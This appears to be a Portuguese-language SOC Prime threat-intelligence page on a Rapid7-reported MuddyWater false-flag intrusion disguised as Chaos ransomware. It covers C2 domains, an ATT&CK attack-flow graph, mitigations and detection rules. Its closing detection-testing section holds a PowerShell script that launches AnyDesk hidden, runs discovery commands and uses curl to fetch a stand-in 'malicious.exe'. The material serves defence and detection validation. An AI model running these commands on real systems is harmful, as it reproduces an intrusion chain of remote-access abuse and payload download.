SOC Prime Bias: Crítico

07 May 2026 15:26 UTC
newspaper icon Rapid7

Ransomware Chaos e a Ameaça Patrocinada pelo Estado por Trás dela

Author Photo
SOC Prime Team linkedin icon Seguir
Ransomware Chaos e a Ameaça Patrocinada pelo Estado por Trás dela
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Resumo

No início de 2026, o que inicialmente parecia ser um incidente rotineiro de ransomware Chaos foi posteriormente identificado como uma operação de falsa bandeira ligada ao grupo MuddyWater, associado ao estado iraniano, também conhecido como Seedworm. Em vez de focar na criptografia de arquivos, os atacantes usaram o Microsoft Teams para engenharia social, roubaram credenciais e tokens de MFA, e implantaram um downloader personalizado junto com um trojan de acesso remoto. A operação reutilizou infraestrutura associada ao MuddyWater, incluindo um certificado de assinatura de código, e foi voltada para roubo de dados e acesso persistente a longo prazo.

Investigação

Os investigadores da Rapid7 reconstruíram a cadeia de intrusão desde o roubo de credenciais baseado no Teams até o uso de ferramentas de administração remota legítimas como AnyDesk e DWAgent, seguido pela entrega de ms_upd.exe, que recuperou um RAT personalizado chamado Game.exe. A equipe identificou domínios de comando e controle incluindo moonzonet.com and uploadfiler.com, juntamente com múltiplos endereços IP associados e um certificado de assinatura previamente ligado ao MuddyWater. A análise de malware também revelou comportamento anti-análise, um mutex usado para impor execução única e mecanismos de persistência envolvendo um serviço e arquivos ocultos.

Mitigação

As organizações devem impor proteções de MFA mais fortes, restringir o acesso remoto à área de trabalho e o compartilhamento de tela do Teams a contas confiáveis e monitorar o uso de ferramentas de acesso remoto legítimas em contextos incomuns. Listagens de permissão de aplicativos devem ser aplicadas a binários assinados por código, e a execução de arquivos não assinados de diretórios acessíveis por usuários deve ser bloqueada. As equipes de segurança também devem auditar o uso de certificados regularmente e bloquear os domínios e endereços IP maliciosos conhecidos associados à campanha.

Resposta

Se essa atividade for detectada, isole os sistemas afetados imediatamente, revogue credenciais comprometidas e tokens de MFA, e inicie a coleta forense completa. A infraestrutura de comando e controle identificada deve ser bloqueada, os serviços AnyDesk e DWAgent devem ser removidos, e o RAT personalizado deve ser erradicado do ambiente. A caça a ameaças também deve ser conduzida para o mutex ATTRIBUTES_ObjectKernel e quaisquer arquivos remanescentes armazenados em ProgramData.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#aaffaa classDef process fill:#ffcc99 classDef malware fill:#ff9999 %% Nodes u2013 Actions action_initial_access["<b>Action</b> – <b>T1566 Phishing</b><br/>Adversário enviou mensagens de chat maliciosas do Microsoft Teams que atraíram usuários para uma sessão de compartilhamento de tela Quick Assist falsa."] class action_initial_access action action_user_exec_link["<b>Action</b> – <b>T1204.001 Execução pelo Usuário: Link Malicioso</b><br/>As vítimas clicaram em um link malicioso entregue via Teams que iniciou o download de <i>ms_upd.exe</i>."] class action_user_exec_link action action_user_exec_copypaste["<b>Action</b> – <b>T1204.004 Execução pelo Usuário: Copiar e Colar Malicioso</b><br/>Os atacantes instruíram os usuários a copiar-colar credenciais em arquivos de texto criados localmente."] class action_user_exec_copypaste action action_cred_access["<b>Action</b> – <b>T1552.008 Credenciais Não Seguras</b> & <b>T1078 Contas Válidas</b><br/>Credenciais colhidas de mensagens de chat e usadas para fazer login em sistemas internos."] class action_cred_access action action_auth_mod["<b>Action</b> – <b>T1556.001 Autenticação do Controlador de Domínio</b><br/>Credenciais comprometidas foram usadas para autenticar no controlador de domínio, ganhando acesso privilegiado."] class action_auth_mod action action_discovery["<b>Action</b> – <b>T1082 Descoberta das Informações do Sistema</b> & <b>T1016 Descoberta da Configuração da Rede do Sistema</b><br/>O malware coletou nome do host, nome de usuário, domínio, endereço IP via ipconfig, whoami, etc."] class action_discovery action action_ingress_transfer["<b>Action</b> – <b>T1105 Transferência de Ferramentas Ingressantes</b><br/><i>ms_upd.exe</i> fez o download de cargas adicionais (WebView2Loader.dll, Game.exe, visualwincomp.txt) usando curl."] class action_ingress_transfer action action_execution["<b>Action</b> – <b>T1059 Interpretador de Comandos e Scripts</b><br/>O atacante executou cmd.exe, PowerShell e pythonw.exe para rodar os binários baixados."] class action_execution action action_process_injection["<b>Action</b> – <b>T1055.011 Injeção de Memória de Janela Extra</b> & <b>T1055.002 Injeção de Executável Portátil</b><br/>pythonw.exe injetou código em processos suspensos para lançar o RAT de forma furtiva."] class action_process_injection action action_defense_evasion["<b>Action</b> – <b>T1027 Arquivos ou Informações Ofuscadas</b> & <b>T1497 Evasão de Virtualização/Sandbox</b><br/>Cargas codificadas em XOR, criptografia AES-256-GCM; verifica DLLs de análise, identificadores de VM e temporização para evitar detecção de sandbox."] class action_defense_evasion action action_persistence["<b>Action</b> – <b>T1219 Ferramentas de Acesso Remoto</b><br/>Implementação do serviço DWAgent e AnyDesk para controle remoto a longo termo."] class action_persistence action action_lateral_movement["<b>Action</b> – <b>T1563 Sequestro de Sessão de Serviço Remoto (RDP)</b> & <b>T1668 Controle Exclusivo</b><br/>Usou sessões RDP legítimas para mover-se lateralmente e executar comandos em hosts adicionais."] class action_lateral_movement action action_collection_exfil["<b>Action</b> – <b>T1560 Arquivo de Dados Coletados</b> & <b>T1041 Exfiltração sobre Canal C2</b><br/>Dados arquivados em arquivo criptografado XOR e carregados para uploadfiler.com."] class action_collection_exfil action action_c2["<b>Action</b> – <b>T1090 Proxy</b> & <b>T1573 Canal Criptografado</b><br/>Comunicação com a infraestrutura C2 (moonzonet.com, uploadfiler.com) via HTTPS com cargas criptografadas."] class action_c2 action %% Nodes u2013 Tools / Files / Processes / Malware file_ms_upd["<b>File</b> – <b>Nome</b>: ms_upd.exe<br/><b>Descrição</b>: Dropper inicial que obtém cargas adicionais."] class file_ms_upd file file_webview ["<b>File</b> – <b>Nome</b>: WebView2Loader.dll<br/><b>Descrição</b>: DLL de suporte para renderização de conteúdo web."] class file_webview file file_game["<b>File</b> – <b>Nome</b>: Game.exe<br/><b>Descrição</b>: Carga secundária executada após o download."] class file_game file file_visual["<b>File</b> – <b>Nome</b>: visualwincomp.txt<br/><b>Descrição</b>: Arquivo de texto usado para dados de configuração."] class file_visual file process_cmd["<b>Process</b> – <b>Nome</b>: cmd.exe<br/><b>Propósito</b>: Executa instruções de linha de comando."] class process_cmd process process_ps["<b>Process</b> – <b>Nome</b>: PowerShell<br/><b>Propósito</b>: Executa scripts PowerShell para execução de carga útil."] class process_ps process process_python["<b>Process</b> – <b>Nome</b>: pythonw.exe<br/><b>Propósito</b>: Executa componentes baseados em Python e realiza injeção de processos."] class process_python process malware_dwaga["<b>Malware</b> – <b>Nome</b>: Serviço DWAgent<br/><b>Propósito</b>: Fornece acesso remoto persistente."] class malware_dwaga malware tool_anydesk["<b>Tool</b> – <b>Nome</b>: AnyDesk<br/><b>Descrição</b>: Utilitário de desktop remoto legítimo usado para persistência e movimento lateral."] class tool_anydesk tool %% Connections u2013 Flow action_initial_access –>|vai_para| action_user_exec_link action_user_exec_link –>|faz download de| file_ms_upd action_user_exec_link –>|vai_para| action_user_exec_copypaste action_user_exec_copypaste –>|fornece| action_cred_access action_cred_access –>|habilita| action_auth_mod action_auth_mod –>|habilita| action_discovery action_discovery –>|dispara| action_ingress_transfer action_ingress_transfer –>|faz download de| file_webview action_ingress_transfer –>|faz download de| file_game action_ingress_transfer –>|faz download de| file_visual action_ingress_transfer –>|vai_para| action_execution action_execution –>|executa| process_cmd action_execution –>|executa| process_ps action_execution –>|executa| process_python process_python –>|injeta| action_process_injection action_process_injection –>|facilita| action_defense_evasion action_defense_evasion –>|habilita| action_persistence action_persistence –>|instala| malware_dwaga action_persistence –>|instala| tool_anydesk malware_dwaga –>|suporta| action_lateral_movement tool_anydesk –>|suporta| action_lateral_movement action_lateral_movement –>|coleta| action_collection_exfil action_collection_exfil –>|exfiltra via| action_c2 %% Styling class action_initial_access,action_user_exec_link,action_user_exec_copypaste,action_cred_access,action_auth_mod,action_discovery,action_ingress_transfer,action_execution,action_process_injection,action_defense_evasion,action_persistence,action_lateral_movement,action_collection_exfil,action_c2 action class file_ms_upd,file_webview,file_game,file_visual file class process_cmd,process_ps,process_python process class malware_dwaga malware class tool_anydesk tool "

Fluxo de Ataque

Detecções

Possível Descoberta da Configuração da Rede do Sistema (via linha de comando)

Equipe SOC Prime
06 de Maio de 2026

Visualizar

Possível Uso do PING para Execução com Atraso (via linha de comando)

Equipe SOC Prime
06 de Maio de 2026

Visualizar

Software Alternativo de Acesso/ Gerenciamento Remoto (via criação de processo)

Equipe SOC Prime
06 de Maio de 2026

Visualizar

Uso Suspeito de CURL (via linha de comando)

Equipe SOC Prime
06 de Maio de 2026

Visualizar

Download de Arquivo Suspeito Via IP Direto (via proxy)

Equipe SOC Prime
06 de Maio de 2026

Visualizar

IOCs (HashSha256) para detectar: Confundindo os Rastros: A Sombra Patrocinada pelo Estado Por Trás do Ransomware Chaos

Regras de IA SOC Prime
06 de Maio de 2026

Visualizar

IOCs (HashSha1) para detectar: Confundindo os Rastros: A Sombra Patrocinada pelo Estado Por Trás do Ransomware Chaos

Regras de IA SOC Prime
06 de Maio de 2026

Visualizar

IOCs (HashMd5) para detectar: Confundindo os Rastros: A Sombra Patrocinada pelo Estado Por Trás do Ransomware Chaos

Regras de IA SOC Prime
06 de Maio de 2026

Visualizar

IOCs (FonteIP) para detectar: Confundindo os Rastros: A Sombra Patrocinada pelo Estado Por Trás do Ransomware Chaos

Regras de IA SOC Prime
06 de Maio de 2026

Visualizar

IOCs (DestinoIP) para detectar: Confundindo os Rastros: A Sombra Patrocinada pelo Estado Por Trás do Ransomware Chaos

Regras de IA SOC Prime
06 de Maio de 2026

Visualizar

Ferramenta de Gerenciamento Remoto Suspeita e Execução de Comando de Descoberta [Criação de Processo do Windows]

Regras de IA SOC Prime
06 de Maio de 2026

Visualizar

Detectar Logons Interativos e Mudanças na Configuração de MFA [Registro de Eventos de Segurança do Microsoft Windows]

Regras de IA SOC Prime
06 de Maio de 2026

Visualizar

Execução da Simulação

Pré-requisito: O Pré-voo de Telemetria e Linha de Base deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente as TTPs identificadas e visam gerar a telemetria exata esperada pela lógica de detecção.

  • Narrativa de Ataque & Comandos:

    1. Estabelecer uma base remota usando a ferramenta legítima de gerenciamento remoto AnyDesk.exe (espelhando o seletor “remote‑tool”).
    2. Realizar reconhecimento de rede executando ipconfig and whoami da mesma sessão – satisfazendo o seletor “discovery command”.
    3. Baixar uma carga maliciosa usando curl invocado por meio de cmd.exe, uma técnica clássica para “Transferência de Ferramenta Ingressante” (T1105) e “Interface de Linha de Comando” (T1059).
    4. Execute a carga para completar a cadeia de morte (não é necessário para a validação da regra, mas incluído para realismo).

  • Script de Teste de Regressão:

    # -------------------------------------------------
# Script de Simulação – aciona a regra Sigma
# -------------------------------------------------
# 1. Iniciar AnyDesk (simulado – assume que AnyDesk está no PATH)
Start-Process -FilePath "AnyDesk.exe" -ArgumentList "--no-sandbox" -WindowStyle Hidden

# 2. Executar comandos de descoberta
$discovery = @(
    "ipconfig /all",
    "whoami",
    "net start"
)
foreach ($cmd in $discovery) {
    cmd.exe /c $cmd | Out-Null
}

# 3. Use cmd.exe + curl para buscar uma carga fictícia
$payloadUrl = "http://example.com/malicious.exe"
$outputPath = "$env:TEMPpayload.exe"
$downloadCmd = "curl $payloadUrl -o $outputPath"
cmd.exe /c $downloadCmd

# Opcional: Executar a carga (comentado por segurança)
# Start-Process -FilePath $outputPath -WindowStyle Hidden
# -------------------------------------------------

  • Comandos de Limpeza:

    # Terminar AnyDesk se ele foi iniciado
Get-Process -Name "AnyDesk" -ErrorAction SilentlyContinue | Stop-Process -Force

# Remover a carga baixada
Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue

# Limpar qualquer instância remanescente de cmd.exe criada pelo script
Get-Process -Name "cmd" -ErrorAction SilentlyContinue | Stop-Process -Force

Fim do Relatório

Junte-se à plataforma Detection as Code da SOC Prime para melhorar a visibilidade das ameaças mais relevantes para o seu negócio. Para ajudá-lo a começar e gerar valor imediato, agende uma reunião agora com os especialistas da SOC Prime.

Cadastre-se Gratuitamente